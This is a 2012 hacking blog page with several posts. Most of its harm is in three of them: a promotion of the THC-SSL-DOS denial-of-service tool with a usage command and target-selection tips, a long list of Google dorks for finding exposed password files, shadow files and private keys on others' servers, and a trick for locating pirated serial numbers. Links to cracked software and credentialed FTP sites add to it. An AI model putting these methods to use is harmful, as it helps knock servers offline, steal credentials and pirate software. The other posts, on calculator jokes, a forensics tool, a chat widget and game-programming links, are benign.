Notice

Join This Channel To Get Latest Phone Tips,Tricks,News,Network Security Course,Hacks etc. For Free on Your Mobile!! ... Join our Facebook Discussion Group -Regards Ankit

30 January 2012

THC SSL DoS/DDoS Tool



A German group of Hackers known as Hackers Choice have released a program they assert will allow a single computer to take down a Web server using a secure connection

THC-SSL-DOS is a tool to verify the performance of SSL.Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet.

This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.

Usage:
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack:

A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server.

This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link.

Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack.

The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes.

The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).

Tips & Tricks for whitehats


  1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.
  2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
  3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port).
Counter measurements:

No real solutions exists. The following steps can mitigate (but not solve) the problem:
  1. Disable SSL-Renegotiation
  2. Invest into SSL Accelerator
Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this.

You can download THC-SSL-DOS here:

Windows: thc-ssl-dos-1.4-win-bin.zip
Linux: thc-ssl-dos-1.4.tar.gzEnjoy...

27 January 2012

Google Funny Tricks 2012



Google search box not only analyze our search string and display perfect results but also provide variety of features such as currency conversions, movie timings, weather forecasts, calculator etc.

However, there is something funny about Google Calculator. Look at these screen-shots :

Google funny calcuator 1



Google funny calcuator 2

Google funny calcuator 3

Google funny calcuator 4

Google funny calcuator 5

Google funny calcuator 6

google calculator mistake 7
Google calculator also provides answers to conversations such as :


  • What’s the answer to life, the universe and everything multiplied by the speed of light divided by three teaspoons?

  • How many seconds in a decade?

  • What’s 98.6 degrees Fahrenheit in Celsius?

  • How many feet in a smoot?

  • Number of horns on a unicorn?

  • What is a googol?

  • What is 1.21 gigawatts divided by 88 miles per hour?

  • What is 1.21 gigawatts multiplied by 88 miles per hour?

  • What is 1 hogshead in litres?

  • What is 30 gigabytes divided by 192kbps?

  • What is 1 furlong per minute?

  • What is 13000 watts to horsepower?

  • How many km in a light year?

  • How many teaspoons in a pint?

  • How many megabytes in an exabyte?

  • What is 125444987 in binary?

  • What is 2008 in roman numerals?

  • What is 100 USD to AUD?

  • What is the mass of the Sun in pounds?

  • What is the square root of 123456789?

  • What is square root of 123456789?

  • Enjoy...

    26 January 2012

    Mobius Forensic Toolkit 0.5.10–Forensics Framework




    Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.
    6726345983_2816144f15

    Installation

    As root, type:
    python setup.py install
    
    Usage
    Run mobius_bin.py.
    You can download Mobius 0.5.10 here:
    mobiusft-0.5.10.tar.gz

    mobiusft-0.5.10.zip

    Enjoy...

    19 January 2012

    Add a Free Chat Box Widget to Your Blogspot Blog




    Here’s the easiest way to add a free Blogger chat box widget (also known as shoutbox, chatterbox, or chat room) to your Blogspot blog. Adding a chat box widget to your blog is an easy way to build community on your site and keep your visitors coming back. It’s so easy we can do it in less than a minute. We’ll use Chatroll live communities to create a chat box widget, customize it, and add it to your Blogger layout.
    Here’s a screenshot of a Blogger blog with a chat box embedded in the main column:


    These steps are easy enough for anyone, but if you have any trouble, you can contact Chatroll Support via live chat or email. Let’s get straight to it!
    Create a Chatroll live community to use for your chat box.
    Go to Chatroll, enter your community’s name in the “Name Your Live Community…” box and click “Create”. Choose a name that fits with your blog, as this name will appear in the chat box title. Write an attractive and detailed description so that people can easily find your new Chatroll community (this will also help drive traffic to your blog).

    Copy the chat window embed code from your live community’s home page.
    In your new live community’s home page (the page that is shown after your community has been successfully created) copy the embed code from the text box labeled ‘embed’. This text box is located under the chat window, as shown below:

    Edit your Layout in Blogger.
    In Blogger, click on the “Layout” tab to show your blog’s layout:

    Add a new HTML/Javascript gadget.
    On your blog’s layout screen, click the “Add a Gadget” link to open the Add a Gadget window:
    In the Add a Gadget window, scroll down and find the “HTML/Javascript” gadget. Click on the “+” icon to add it.



    Paste the Chatroll embed code into the HTML/Javascript gadget.
    On the new HTML/Javascript gadget screen, enter a title for the gadget. A good title should alert your readers that this is your site’s live chat. Here’s the important part: Paste the chat window embed code into the Content area (this is the code you copied from Chatroll in step 2):

    Finally, click “Save”. The gadget should now be visible in your blog’s layout.
    That’s it! You’ve just chat-enabled your Blogger or Blogspot blog! You can now use the Blogger Layout tab to drag the chat box widget wherever you want in your blog’s layout.
    Here’s a few more tips for best results:
    Position the chat box so it appears on every page: For best results, place the chat box where it will appear on every page, so that your readers can continue their conversation even if they move from one page to another within your blog.
    Match the chat box colors and size to your blog’s template:To further maximize your chat widgets’s success, you’ll want to customize it to match your site design. Chatroll lets you customize the position, size, and color of the chat to fit in perfectly with your blog’s template. Each time you customize the chat, simply click “Edit” on the chat gadget in the Blogger Layout page and re-paste the embed code.
    Enjoy...

    18 January 2012

    Game Programming Basics




    DirectX

    -
    http://www.c-unit.com/tutorials/
    - http://www.sunlightd...indows/DirectX/
    - http://msdn.microsoft.com/directx/ --Microsoft Official DX website--
    - http://www.drunkenhyena.com/
    - http://www.two-kings...orials/d3d.html


    OpenGL


    -
    http://www.gamedev.net
    - http://www.flipcode.com (also has some really good Win32 tuts)
    - http://www.gamasutra.com
    - http://nehe.gamedev.net
    - http://www.opengl.org
    - http://www.lighthouse3d.com
    - http://www.opengl.or..._1.0/index.html good

    Allegro/AllegroGL


    -
    http://www.talula.demon.co.uk/allegro/
    - http://allegrogl.sourceforge.net/
    - http://www.grandgent.com/allegro/faq/
    - http://www.grandgent...ace/vivace.html - really good..
    - http://www.loomsoft....lltut_index.htm

    Other

    - http://devpaks.org/
    - http://www.3dcafe.com/asp/meshes.asp 3D models for your games
    - http://www.devmaster.net/
    - http://www.humus.ca/
    Enjoy...

    16 January 2012

    List of FTP Sites -Free mp3,videos and Softwares



    1. ftp://ftp.freenet.de/pub/filepilot/
    2. ftp://193.43.36.131/Radio/MP3/
    3. ftp://195.216.160.175/
    4. ftp://207.71.8.54:21/games/
    5. ftp://194.44.214.3/pub/music/
    6. ftp://202.118.66.15/pub/books
    7. ftp://129.241.210.42/pub/games/
    8. ftp://clubmusic:clubmusic@217.172.16.3:8778/
    9. ftp://212.174.160.21/games
    10. ftp://ftp.uar.net/pub/e-books/
    11. ftp://129.241.210.42/pub/games/
    12. ftp://193.231.238.4/pub/
    13. ftp://207.71.8.54/games/
    14. ftp://194.187.207.98/video/
    15. ftp://194.187.207.98/music/
    16. ftp://194.187.207.98/soft/
    17. ftp://194.187.207.98/games/
    18. ftp://ftp.uglan.ck.ua/
    19. ftp://159.153.197.74/pub
    20. ftp://leech:l33ch@61.145.123.141:5632/
    21. ftp://psy:psy@ftp.cybersky.ru
    22. ftp://130.89.175.1/pub/games/
    23. ftp://194.44.214.3/pub/
    24. ftp://195.116.114.144:21/
    25. ftp://64.17.191.56:21/
    26. ftp://80.255.128.148:21/pub/
    27. ftp://83.149.236.35:21/packages/
    28. ftp://129.241.56.118/
    29. ftp://81.198.60.10:21/
    30. ftp://128.10.252.10/pub/
    31. ftp://129.241.210.42/pub/
    32. ftp://137.189.4.14/pub
    33. ftp://139.174.2.36/pub/
    34. ftp://147.178.1.101/
    35. ftp://156.17.62.99/
    36. ftp://159.153.197.74/pub/
    37. ftp://193.140.54.18/pub/
    38. ftp://192.67.63.35/
    39. ftp://166.70.161.34/
    40. ftp://195.161.112.15/musik/
    41. ftp://195.161.112.15/
    42. ftp://195.131.10.164/software
    43. ftp://195.146.65.20/pub/win/
    44. ftp://199.166.210.164/
    45. ftp://195.46.96.194/pub/
    46. ftp://61.136.76.236/
    47. ftp://61.154.14.248/
    48. ftp://62.210.158.81/
    49. ftp://62.232.57.61/
    50. ftp://212.122.1.85/pub/software/
    51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/
     Enjoy...

    15 January 2012

    AIO - Mega Software Pack 2011




    AIO - Mega Software Pack 2011 [Multi / Eng]
    [RAR | Pack | Installs | XP/Vista/7 | 492 MB]

    description:

    Software Mega Pack 2011. last example that has been registered and the genuinesoftware Activating life. Includes software to do anything and everything ascompression, Extraction, visualizaciny image edition, Surf, download acceleration, Development of the game, grabacin game, the creation of the installer chatting, playing to the media of communication, the screenshot grabacin, creation of icons,DVD image mounting Activating Operating Systems, Gamepad Emulation .. ALLALONE ..

    content:

    * 7z file manager, WinZip, WinRAR (all entries)
    * ACDSee Pro (The best image viewer and editor)
    * Browser Pack (superior browsers to enhance the experience of navegacin
    * Fraps (game grabacin and Benchmarking)
    * I Screen Recorder and Snagit (grabacin screenshot)
    * Install Creator Pro (for the creation of an installer)
    * Pack Messenger (For Exchange Fora)
    * Media Players Pack (reproductions of all audio and video formats)
    * Copy of Tera (increase the speed of copy)
    * And much more ..

    Technical Data:

    RAM: Minimum 256 MB with
    HDD: + 150 Mb Free Descrompresion
    Operating System: Windows XP/Vista/7
    Interface: English
    Language: Multilingual
    Compression: RAR
    Format: ISO and / or Installer
    Uploader: Blade Master 666

    AIO - Mega Software Pack 2011 [Multi / Eng]
    [RAR | Pack | Installs | XP/Vista/7 | 492 MB]

    DOWNLOAD



    Enjoy...

    14 January 2012

    Microsoft Math graphing calculator



    Does the Windows Calculator that brings by default is not enough for you?

    Well, the calculator has been a default in Windows since the release of Windows 1.0, and the calculator received a total renovation and added a bunch of new features in Windows 7 is not yet powerful enough for most equations in algebra and advanced mathematics. 
    On the other hand, free Powertoy calculator that was released with XP does not work in Windows 7 or Vista, and for a time, the only solution graphing calculator for PC users have been online tools as WolframAlpha.com. 
    That has changed since Microsoft released Microsoft Math qie 4. Previously, a commercial program, Microsoft Math 4 is now completely free for Windows users. It is a great application that can solve equations, differential or integral, and create 2D and 3D graphics. Whether you're using the keyboard or a tablet device, you can solve your math questions quickly. In addition, the application uses the interface ribbon (tape), so it is easy to learn and use. Microsoft Math can solve equations, difereciar or integrate, and even show you the steps to find the answer. While some teachers may fear being used to cheat, it's actually a great way to understand how to solve more complex problems with which you would have otherwise stalled. then on the tab graphic (Graphing) You can create 2D and 3D graphics in seconds. Zoom in or out with the scroll wheel. The graphics are incredibly smooth for a utility application like this! Microsoft added seven skins (skins) to change the look of the calculator. To see them just go to the View tab and then Skins. It is a very useful application, especially if you or someone in your family still in school. In fact, the only problem is you might be tempted to use it to solve your difficult math problem instead of using your gray matter! Files in this Download MSetup_x64.exe 18.7MB LINK System Supported Operating Systems: Windows 7, Windows Server 2003 Service Pack 2, Windows Server 2008 R2, Windows Server 2008 Service Pack 2, Windows Vista Service Pack 2, Windows XP Service Pack 3 Microsoft. NET Framework 3.5 SP1 free download with a Team 500 MHz Pentium processor or equivalent (minimum) Pentium 1 GHz or equivalent (recommended) 256 MB of RAM (minimum), 512 MB ​​or more (recommended)Display Resolution 800 x 600, 256 ( minimum), 1024 x 768, 32 bits (recommended) video card with 64 MB of video RAM 65 MB of disk space available . This one apparently left by whether it is useful, well at least for me it was very useful...........





    Enjoy...

    13 January 2012

    How to get the serial number you need



    * Go to Google.

    * In the search field type: "Product name" 94FBR

    * Where, "Product Name" is the name of the item you want to find the serial number for.

    * And voila - there you go - the serial number you needed
    .

    HOW DOES THIS WORK?

    Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

    See these example searches:

    "Photoshop 7" 94FBR
    "Age of Mythology" 94FBR
    "Nero Burning Rom 5.5" 94FBREnjoy...

    12 January 2012

    Password Dorks Google -Google Password Hacking



    Here are Some Of The Google Dorks,That Will Get you Some Juicy Passwords,Have Fun:

    "admin account info" filetype:log
    ! Host=*.* intext :enc_UserPassword=* ext:pcf
    "# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =*" "http://*:*@www" domainname
    "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
    "parent directory" +proftpdpasswd
    "powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
    "Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
    "powered by duclassmate" - site:duware.com
    "Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
    "Powered By Elite Forum Version *.*"
    "Powered by Link Department"
    "sets mode: +k"
    "your password is" filetype:log
    " Powered by DUpaypal" -site: duware.com
    allinurl: admin mdb auth_user_file.txt
    config.php
    eggdrop filetype:user user
    enable password | secret "current configuration" -intext : the
    etc (index.of)
    ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
    ext:inc "pwd=" "UID=" ext:ini eudora.ini
    ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
    ext:txt inurl:unattend. txt
    ext:yml database inurl:config filetype:bak createobject sa
    filetype: bak inurl:"htaccess|passwd|shadow| htusers"
    filetype:cfg mrtg "target[*]" - sample -cvs -example
    filetype:cfm "cfapplication name" password filetype: conf oekakibbs
    filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
    filetype:dat "password .dat"
    filetype:dat inurl:Sites. dat
    filetype:dat wand.dat
    filetype:inc dbconn
    filetype:inc intext : mysql_connect
    filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
    filetype:ini inurl:"serv-u.ini"
    filetype:ini inurl: flashFXP.ini
    filetype:ini ServUDaemon filetype:ini wcx_ftp
    filetype:ini ws_ftp pwd
    filetype:ldb admin
    filetype:log "See `ipsec --copyright"
    filetype:log inurl:"password .log"
    filetype:mdb inurl: users.mdb
    filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
    filetype:pem intext : private
    filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
    filetype:reg reg +intext :"defaultusername" +intext
    :"defaultpassword"
    filetype:reg reg +intext :”WINVNC3”
    filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
    filetype:sql "insert into" (pass|passwd|password )
    filetype:sql ("values * MD5" | "values * password " | "values * encrypt";)
    filetype:sql ("passwd values" | " password values" | "pass values" )
    filetype:sql +"IDENTIFIED BY" -cvs
    filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
    filetypels username password email
    htpasswd
    htpasswd / htgroup
    htpasswd / htpasswd.bak
    intext
    :"enable password 7"
    intext :"enable secret 5 {:content:}quot;
    intext
    :"powered by EZGuestbook"
    intext
    :"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
    intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
    intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
    intitle: index.of administrators.pwd
    intitle: Index.of etc shadow
    intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
    intitle:rapidshare intext :login
    inurl:"calendarscript/users. txt"
    inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
    inurl:"GRC. DAT" intext :"password "
    inurl:"Sites. dat"+"PASS="
    inurl:"slapd.conf" intext
    :"credentials" -manpage -"Manual Page" -man: -sample
    inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
    inurl:"wvdial. conf" intext :"password "
    inurl:/db/main. mdb
    inurl:/wwwboard
    inurl:/yabb/ Members/Admin.dat
    inurl:ccbill filetype:log
    inurl:cgi-bin inurl:calendar. cfg
    inurl:chap-secrets -cvs
    inurl:config. php dbuname dbpass
    inurl:filezilla.xml -cvs
    inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
    inurl:nuke filetype:sql
    inurl:ospfd. conf intext :password -sample -test - tutorial -download
    inurl:pap-secrets - cvs
    inurl:pass.dat
    inurl:perform filetype: ini
    inurl:perform.ini filetype:ini
    inurl: secring ext:skr | ext:pgp | ext:bak
    inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
    inurl: vtund.conf intext :pass -cvs
    inurl:zebra. conf intext :password -sample -test - tutorial -download
    LeapFTP intitle:"index.of./" sites.ini modified master.passwd
    mysql history files NickServ registration passwords
    passlist passlist.txt (a better way)
    passwd passwd / etc (reliable)
    people.lst psyBNC config files
    pwd.db
    server-dbs "intitle:index of"
    signin filetype:url spwd.db / passwd
    trillian.ini
    wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
    [WFClient] Password = filetype:ica
     
    Enjoy...

    Views This Month

     

    HaCk-O-PeDia - The Hacker's Encyclopedia. Copyright 2010 All Rights Reserved To Ankit